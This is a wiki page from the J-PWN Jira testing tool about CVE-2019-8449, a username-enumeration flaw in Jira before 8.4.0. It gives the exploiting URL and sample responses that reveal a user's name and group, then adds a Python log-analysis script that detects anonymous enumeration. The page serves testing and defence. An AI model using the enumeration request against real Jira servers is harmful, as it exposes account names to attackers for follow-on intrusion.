CVE‐2019‐8449 - carnal0wnage/J-PWN GitHub Wiki
CVE-2019-8449
Category: [Username Enumeration]
[CG] You can brute-force usernames or guess/validate group names at this endpoint.
module name: check_cve_2019_8449
url: /rest/api/latest/groupuserpicker?query=<usernametoguess>&maxResults=50000&showAvatar=true
+ [Username Enumeration] CVE-2019-8449 Detected
URL: https://jira/jira/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
URL: https://jira/jira/rest/api/latest/groupuserpicker?query=<usernametoguess>&maxResults=50000&showAvatar=true
Total Users Found: 0
User Header: Showing 0 of 0 matching users
User Details: No users listed.
Total Groups Found: 0
Group Header: Showing 0 of 0 matching groups
Group Details: No groups listed.
ex: 1 - Query for the group jira-users
https://jiraserver/jira/rest/api/latest/groupuserpicker?query=jira-users&maxResults=50000&showAvatar=true
{
  "users": {
    "users": [],
    "total": 0,
    "header": "Showing 0 of 0 matching users"
  },
  "groups": {
    "header": "Showing 1 of 1 matching groups",
    "total": 1,
    "groups": [
      {
        "name": "jira-users",
        "html": "\u003Cb\u003Ejira-users\u003C/b\u003E",
        "labels": []
      }
    ]
  }
}
ex: 2 - Query for a specific user tkha
https://jiraserver/jira/rest/api/latest/groupuserpicker?query=tkha
{
  "users": {
    "users": [
      {
        "name": "tkha",
        "key": "tkha",
        "html": "Thong Kha (\u003Cstrong\u003Etkha\u003C/strong\u003E)",
        "displayName": "Thong Kha"
      }
    ],
    "total": 1,
    "header": "Showing 1 of 1 matching users"
  },
  "groups": {
    "header": "Showing 0 of 0 matching groups",
    "total": 0,
    "groups": []
  }
}
Patched versions will give you a 401 or 403
You are not authenticated. Authentication required to perform this operation.
--
Description: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
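For defenders, the behaviour above can be checked in web access logs: anonymous requests to groupuserpicker answered with 200 mean the instance is still exposed, and one source cycling through many `query` values is the enumeration pattern. This is an added example, not part of J-PWN or the original page; the combined-style log format, the `-` marker for anonymous requests, the threshold and the `analyze` function are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in a combined-style access log format (assumption).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2024:10:00:01 +0000] "GET /jira/rest/api/latest/groupuserpicker?query=admin&maxResults=50000&showAvatar=true HTTP/1.1" 200 412
203.0.113.7 - - [12/Mar/2024:10:00:02 +0000] "GET /jira/rest/api/latest/groupuserpicker?query=tkha&maxResults=50000&showAvatar=true HTTP/1.1" 200 398
203.0.113.7 - - [12/Mar/2024:10:00:03 +0000] "GET /jira/rest/api/2/groupuserpicker?query=jira-users HTTP/1.1" 200 377
198.51.100.9 - alice [12/Mar/2024:10:05:00 +0000] "GET /jira/rest/api/latest/groupuserpicker?query=bob HTTP/1.1" 200 390
192.0.2.44 - - [12/Mar/2024:10:06:00 +0000] "GET /jira/rest/api/latest/groupuserpicker?query=root HTTP/1.1" 401 95
192.0.2.44 - - [12/Mar/2024:10:06:01 +0000] "GET /jira/secure/Dashboard.jspa HTTP/1.1" 200 9000
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Matches /rest/api/latest/groupuserpicker and other version segments such as /rest/api/2/.
PICKER_RE = re.compile(r"/rest/api/[^/]+/groupuserpicker$")


def analyze(log_text, min_distinct=3):
    """Summarise anonymous groupuserpicker traffic per source IP."""
    answered = defaultdict(set)   # ip -> distinct query values answered with 200
    rejected = defaultdict(int)   # ip -> requests refused with 401/403 (patched behaviour)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not PICKER_RE.search(parts.path):
            continue
        if m["user"] != "-":      # assumption: "-" means no authenticated user
            continue
        query = parse_qs(parts.query).get("query", [""])[0]
        if m["status"] == "200":
            answered[m["ip"]].add(query)
        elif m["status"] in ("401", "403"):
            rejected[m["ip"]] += 1
    suspects = {ip: sorted(q) for ip, q in answered.items() if len(q) >= min_distinct}
    return {"exposed": bool(answered), "suspects": suspects, "rejected": dict(rejected)}


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

An `exposed` value of true means at least one anonymous request was answered, so the instance should be upgraded to 8.4.0 or later; `rejected` counts show probing against an already patched instance.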